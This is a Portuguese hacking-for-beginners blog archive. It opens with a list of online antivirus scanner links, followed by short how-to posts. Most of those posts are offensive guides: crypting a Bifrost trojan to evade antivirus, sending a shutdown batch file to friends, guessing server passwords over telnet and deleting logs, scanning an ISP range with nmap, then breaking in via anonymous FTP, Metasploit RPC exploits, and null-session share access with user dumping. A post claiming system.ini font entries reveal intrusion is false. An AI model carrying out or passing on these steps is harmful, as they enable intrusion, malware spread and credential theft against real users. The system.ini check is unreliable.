Esses antivírus fazem uma análise completa do seu disco. A maioria funciona apenas no Internet Explorer ou requer instalação de plugins. Note que antivírus online são extremamente limitados e não possuem os mesmos recursos que soluções comums de antivírus. Por esse motivo, não se baseie no desempenho dos serviços online para escolher sua solução definitiva.
OS MAIS FAMOSOS:
http://www.pandasoftware.com/activescan/
http://support.f-secure.com/enu/home/ols.shtml
http://www.kaspersky.com/virusscanner
http://www.bitdefender.com/scan8/ie.html
http://security.symantec.com/sscv6/default.asp?langid=ie&venid=sym
http://housecall.trendmicro.com/
http://www.ewido.net/en/onlinescan/
http://www.virustotal.com
Todos os outros:
Anubis
http://anubis.iseclab.org/index.php (http://anubis.iseclab.org/index.php)
Avast
http://onlinescan.avast.com/
Dr.Web
http://www.drweb.com/online
Filterbit
http://www.filterbit.com/
Fortinet
http://www.fortiguardcenter.com/anti...s_scanner.html (http://www.fortiguardcenter.com/anti...s_scanner.html)
Microsoft Malware
https://www.microsoft.com/security/portal/submit.aspx
Surfright
https://www.webimmune.net/default.asp
ThreatExpert
http://www.threatexpert.com/filescan.aspx
Kaspersky en ligne virus scanner
http://www.kaspersky.com/virusscanner
McAfee FreeScan
http://fr.mcafee.com/root/mfs/default.asp
Panda ActiceScan 2.0
http://www.pandasecurity.com/activescan/index/
Symantec Security Check
http://security.symantec.com/
BitDefender Scanner en ligne
http://www.bitdefender.com/scan8/ie.html
Trend Micro HouseCall
http://housecall.trendmicro.com/
ActualResearch RegFreeze
http://www.actualresearch.com/rf_onlinescan.php
AHNLAB MyV3
http://global.ahnlab.com/global/products/myv3.html
ArcaBit Analyse en ligne
http://arcaonline.arcabit.com/scanner.html
a-squared Web Malware Scanner
http://www.emsisoft.fr/fr/software/free/
Clamav en ligne
http://www.gietl.com/test-clamav/
Dr.Web en ligne
http://online.drweb.com/?url=1
Emsisoft en ligne
http://www.emsisoft.com/en/software/ax/?scan=1
Eset Analyse en ligne
http://www.eset.com/onlinescan/
ewido (AVG) en ligne avec Spyware Scanner de nettoyage ou de suppression
http://www.ewido.net/en/onlinescan/
F-Secure Online Scanner
http://support.f-secure.com/enu/home/ols.shtml
DoxDesk
http://www.doxdesk.com/parasite/
FaceTime / XBlock X-Cleaner
http://research.sunbelt-software.com/Submit.aspx
Hauri LiveCall
http://www2.globalhauri.com/html/onl...l_service.html (http://www2.globalhauri.com/html/onl...l_service.html)
JoeBox
http://www.joebox.org/submit.php
Jotti's Malware Scan
http://virusscan.jotti.org/
Kaspersky Virus Scanner
http://www.kaspersky.com/scanforvirus
Norman Sandbox
http://www.norman.com/microsites/nsic/Submit/en
PC Pitstop
http://www.pcpitstop.com/antivirus/AVLoad.asp
Sunbelt Malware Sandbox
http://research.sunbelt-software.com/Submit.aspx
Tenebril online Spyware Scanner
http://www.tenebril.com/scanner/main_scan.php
Université de Victoria Adware
http://helpdesk.uvic.ca/security/adw...are_check.html (http://helpdesk.uvic.ca/security/adw...are_check.html)
VirSCAN.org
http://www.virscan.org/
Virus Chaser sur le Web
http://www.viruschaser.com/enwi/4_01.jsp
VirusChief
http://www.viruschief.com/
VirusTotal en ligne
http://www.virustotal.com/
Virus.Org Rogue
http://scanner.virus.org/
Windows Live OneCare
http://onecare.live.com/site/en-us/default.htm
ZoneAlarm Online Spyware Scanner
http://www.zonealarm.com/store/conte...try=US&lang=en (http://www.zonealarm.com/store/*****...try=US&lang=en)
AHNLAB MyV3 Real-Time Scan
http://global.ahnlab.com/global/products/myv3_rts.html
AHNLAB MySpyZero
http://global.ahnlab.com/global/products/myspyzero.html
Athentium commande à la demande
http://www.commandondemand.com/eval/cod/codie.htm
Avert (r) WebImmune Labs
http://analyzer.surfright.nl/analyzer/
Bestand
http://www.anti-virus.by/check/
CA eTrust virus scanner
http://www.ca.com/us/securityadvisor...info/scan.aspx (http://www.ca.com/us/securityadvisor...info/scan.aspx)
CA eTrust PestScan
http://www.ca.com/us/securityadvisor/pestscan/
Guanghua (VirusChina)
http://viruschina.com/include/mfzxsd.asp
Kill AJinChen Web Scan
http://www.kill.com.cn/product/webscan/718.asp
Kingsoft Qing Duba en ligne
http://shadu.duba.net/
NetEase 163.com
http://tech.163.com/Other/virus/1/online(1 (http://tech.163.com/Other/virus/1/online%281)).
NetEese 163.com virus Trojan Clinic Web Detector
http://tech.163.com/Other/virus/muma.html
QQ Centre
http://safe.qq.com/cgi-bin/tso/show_scan
Sanlen sécurité Antiunknown
http://online.sanlen.com/free.htm
Sky.net.cn Scan en ligne
http://pfw.sky.net.cn/scan.html
MKS Skaner On-Line
http://www.anti-virus.by/check/
Scanners Online - iniciantes
Marcadores: Hackers 0 comentáriosàs 07:46
Deixando seu arquivo Indetectavel - Iniciantes
Marcadores: Hackers 0 comentários
Esta é uma tecnica antiga, nao funciona mais porem, é esta a sequencia basica para se deixar qualquer arquivo indetectavel, mude apenas os programas .
Programas Necessarios:
- Um Trojan nesse caso o Bifrost
- O Cactus Joiner
- Private Exe Protector
- Bat to Exe Converter
1- Crie Seu Server com o Bifrost ou Outro Trojan
2- Abra o Cactus joiner e selecione seu server
3- Pelo Propio Cactus Joiner Modifiqueo assim: Hide Yes, Regedit Yes
4- Selecione Outro arquivo para apenas usar como Pretexto como uma foto ou Texto
5- Em opcoes Generales Selecione as 2 caixinhas e deixe sem icones mesmo
6- Clique em Ok e depois quando for compilar mude de EXE para BAT
7- Abra o Private Exe Protector e Selecione o BAT que vc criou
8- Proteja-o com o Propio Private Clicando no Cadeadinho
9- Abra o Converte Bat to Exe e Selecione o Bat protegido
10- Selecione um Ícone de Sua preferencia e Compile!
Pronto, esta tecnica funcionava tempos atras, porem pouca coisa mudou, encontre crypters indetectaveis e apenas mude os programas a ordem sempre é a mesma!
às 07:45
Desligando o PC do seu amigo - Inciantes
Marcadores: Hackers 0 comentários
É muito simples, vc deve seguir os seguintes passos!!!
1º Abra seu Bloco de Notas, pois todo windows vem com um. (Iniciar/ Acessórios..)
2º Cole o Código exatamente como apareçe abaixo, no seu bloco de notas.
shutdown -s -f -t 0
3º Salve em algum lugar que você encontre-o fácil, com qualquer nome, mas tem que ter no final .bat Exemplo: Até mais amigo .bat
4º Encontre onde você salvou, e teste ele. Se desligar seu computador, é porque ficou bom.
5º Se você for mandar pra um amigo por msn, deverá compactar ele antes. Pois o msn não aceita (nem email). Para compactar você deve usar o winzip ou winrar Mais aconselhável winrar.
6º Mande ele e se divirta!!! Obs:Isso só funcionará em seu amigo, se o sistema dele não for Windows 95,97 e 98, pois esses não tem recursos de desligagem automática sem precisar apertar o botão. Divirtam-se!
às 07:44
Saiba se voce esta sendo Hackeado - Iniciantes
Marcadores: Hackers 0 comentáriosVai para INICIAR.
Executar
DIGITE: SYSTEM.INI
OK
VAI APARECER ESTA JANELA QUER ESTAR ESCRITO NELA OS SEGUINTES ITENS
woafont=app850.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON
SE APARECER ESTE NUMERO ‘’850’’, ENTÃO SEU PC ESTAR BEM PROTEGIDO!!!
EXEMPLO:
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON
E SE APARECER ‘’WOA’’
HUM…ENTÃO SEU PC ESTAR SENDO INVADIDO OU TEM ARQUIVOS QUE FACILITAM A INVASÃO
EXEMPLO:
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
às 07:43
Entenda os cookies - Inciantes
Marcadores: Hackers 0 comentários
Cookie é um tipo de arquivo que armazena no seu micro as configurações escolhidas para uma determinada página ou site . Quando você retornar àquela página , as informações gravadas no cookie serão enviadas para o site , com o nobre objetivo de não apenas reduzir o tempo de acesso mas para personalizá-lo .
Perigo e Privacidade
Há mais de uma maneira de utilizar "cookies" para rastrear a navegação na rede . A modalidade que representa a maior ameaça à privacidade do internauta é conhecida como "web bug" (grampo da rede) .
Ela funciona da seguinte maneira : suponha que você visite um determinado site e receba um "cookie" enviado pela empresa X . Cada cookie , que nada mais é do que um arquivo txt , traz um número de série único que é atribuído ao seu computador .
Em seguida , você visita outro site onde a mesma empresa X também envia cookies . Ao entrar nessa página , os computadores da empresa X reconhecem o número de identificação do seu cookie e acrescentam o endereço visitado a um prontuário digital sobre a sua máquina . Se nada for feito , e você continuar visitando sites onde há cookies dessa mesma empresa , após alguns dias ela terá uma coleção com os endereços que você visitou . Mas ainda não é possível relacionar esses dados com o seu nome , endereço ...
Embora improvável , essa associação é tecnicamente possível : basta que você forneça seus dados pessoais para algum site que se disponha a compartilhá-los com a empresa X .
A DoubleClick http://www.doubleckick.com , empresa que gerencia a maior rede de cookies da Internet , nega adotar qualquer um desses procedimentos .
O problema é que , como o cookie passa sempre por baixo das pernas do proprietário do micro , quem pode garantir que ele contenha somente informações referentes ao site ? Será que ele , já que esteve ali no micro , sem fazer nada , não anotou uns dados importantes e depois , despretensiosamente , comentou com as pessoas do site ?
Defesa e Solução
Se você prefere melhorar a sua privacidade sozinho a confiar em empresas , há vários programas e soluções que podem ajudá-lo .
Como muitos sites não funcionam sem cookies , a única solução é utilizar um software regulador de cookies .
Configurar o browser para não aceitar cookies ;
Download do Cookie Viewer Clique aqui
Download : 290 Kbytes
Descrição : Programa gratuíto ; permite a visualização e o apagamento dos cookies armazenados no PC .
http://www.winmag.com/
Download do IDcide Clique aqui
Download : 1.31 Mbytes
Descrição : Programa gratuíto ; permite o controle e monitoramento dos cookies enviados para o computador do usuário , exibundo o endereço das páginas que estão tentando bisbilhotar o computador ; requer o IE 4 ou superior .
http://www.idcide.com
É perfeitamente possível apagar os "cookies" manualmente , mas como eles podem ser armazenados em várias pastas do micro , você pode acabar esquecendo de eliminar alguns
Internet Explorer e Netscape
Uma opção presente no Internet Explorer é permitir que somente alguns sites enviem os arquivos . Para ativá-la , clique em Ferramentas , Opções da Internet , Segurança , Sites confiáveis , Sites e digite os endereços de cada um . Em seguida , altere o nível de segurança para Médio .
Os navegadores da Netscape permitem um truque para entrar em sites que exigem cookies sem recebê-los : apague o arquivo cookie.txt (ele fica na pasta Users , dentro do diretório Netscape) , crie outro com o mesmo nome e salve-o no mesmo lugar . Depois clique como o botão direito , escolha Propriedades e marque o item Somente leitura .
às 07:42
Obtendo senhas - Iniciantes
Marcadores: Hackers 0 comentários
OS MEIOS MAIS COMUNS DE SE CONSEGUIR SENHAS DE ACESSO ESTÃO LISTADOS ABAIXO :
CAVALO DE TRÓIA
O Hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.
FAREJAMENTO DE REDES
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.
ENGENHARIA SOCIAL
É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.
QUEBRA CABEÇA
Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.
INVASÃO DO SERVIDOR
O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.
DEDUÇÃO
Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain
MÃOS A OBRA !!!
Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log, caso você não saiba.
às 07:41
Continuando downloads cancelados pelo Firefox - Iniciantes
Marcadores: Hackers 0 comentários
Vamos supor, você está baixando um filme ou um jogo 700mb, e então você sua internet cai, o download estava em 80% e você não quer começar tudo de novo, então faça o seguinte:
1° baixe o wget for windows, você encontra ele nesta pagina: http://pages.interlog.com/~tcharron/wgetwin.html e clique no link "wgetwin-1_5_3_1-binary.zip" e baixe-o.
2º descompacte-o wget.exe para alguma pasta tipo c:\wget e então abra um terminal (iniciar -> executar e digite cmd para winXP e command.com para outras versões)
3° mude para a pasta do wget (cd c:\wget)
4° copie o arquivo .part do firefox para a pasta do wget
5° remova o .part do nome do arquivo (ex. se era filme3.avi.part vai ficar filme3.avi)
6° vá até o site de onde você baixou o arquivo e copie o endereço exemplo: http://s2.up-file.com/download3/e32c...br.by.onix.avi
(link do filme turistas upado por onix)
e no terminal dentro da pasta do wget digite:
"wget -c http://s2.up-file.com/download3/e32c...br.by.onix.avi"
(sem as aspas)
7° e pronto você está baixando o arquivo de onde você parou.
às 07:40
Invasão pelas portas 21,23,135,445 - Iniciantes
Marcadores: Hackers 0 comentários23: TELNET
135: RPC
445: COMPARTILHAMENTO
Estes ataques precisam ter pessoas do mesmo provedor que você.
Vamos começar:
Pegue o seu ip externo(sugestão:www.meuip.com.br ).
Baixe o nmap e instale no seu pc.
Vamos supor que o seu ip seja: 201.33.22.18.
Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.
Prosseguindo…
Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.
digite:
nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44
Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.
Código:
Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164
vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.
Iniciar>Executar>cmd>ftp>open>201.33.22.
Invasao pela porta 23
Iniciar>Executar>cmd>telnet>open>201.33.
Invasao pela porta 135
CASO a porta 135 aberta, podemos usar o METASPLOIT
abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.
depois disso escolha o tipo de conexao como: GERENIC\SHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.
depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
Invasao pela porta 445
Esta porta é de compartilhamento.
Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:”"
Comando concluído com êxito.
baixa o Dumpusers
ponha ele no C:\
abra o cmd digite;
dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:
iniciar>executar>\\201.45.241.175\c$
às 07:40
10 Maneiras de acessar um site bloqueado - Iniciantes
Marcadores: Hackers 0 comentáriosCom o Privoxy – mais recomendado – basta seguir as instruções desta página.
às 07:37
Criando mais Emails do que permitido no HotMail - Iniciantes
Marcadores: Hackers 0 comentários
Quando o Hotmail retornar aquele erro, dizendo que você não pode mais criar emails, que só poderá depois de 24 Horas.
Você vai fazer o seguinte !
Isso acontece pois o Hotmail, define um numero de criações por dia /ip.
No nosso caso aqui no Brasil o limite são 3 emails Diarios,
o sistema é o trocar o Ip pelo de algum pais,
para acabar com esse erro vamos fazer o seguinte !
Entre no Site:
http://www.samair.ru/proxy/ip-address-0
Na lista que irá aparecer percebam que tem 2 colunas:
1 coluna: IP
2 coluna: Porta
Pois bem, primeiramente escolha um Ip cuja a porta seja de preferência 80 ou 8080
Pois são as de mais facil acesso ! ( Lembrando que tem que ser de outro pais )
Nesse exemplo vou pegar um Ip da India:
IP: 202.54.61.99
Porta: 8080
Após fazer isso no Seu Firefox tem um Menu la encima.
Clique em Ferramentas > Opções > Clique no canto superior direito na aba que esta escrito " Avançado "
Após isso clique na aba " Rede " e logo abaixo em " Configurar Conexão "
Ao fazer isso irá aparecer uma nova janela:
No começo você irá assinalar a 3ª Opção ... Colocar o IP e a Porta logo na Frente como na foto.
E Assinale a " Caixinha " logo abaixo do IP e de Ok !
Usando esse método você poderá criar muitos emails por dia.
às 07:36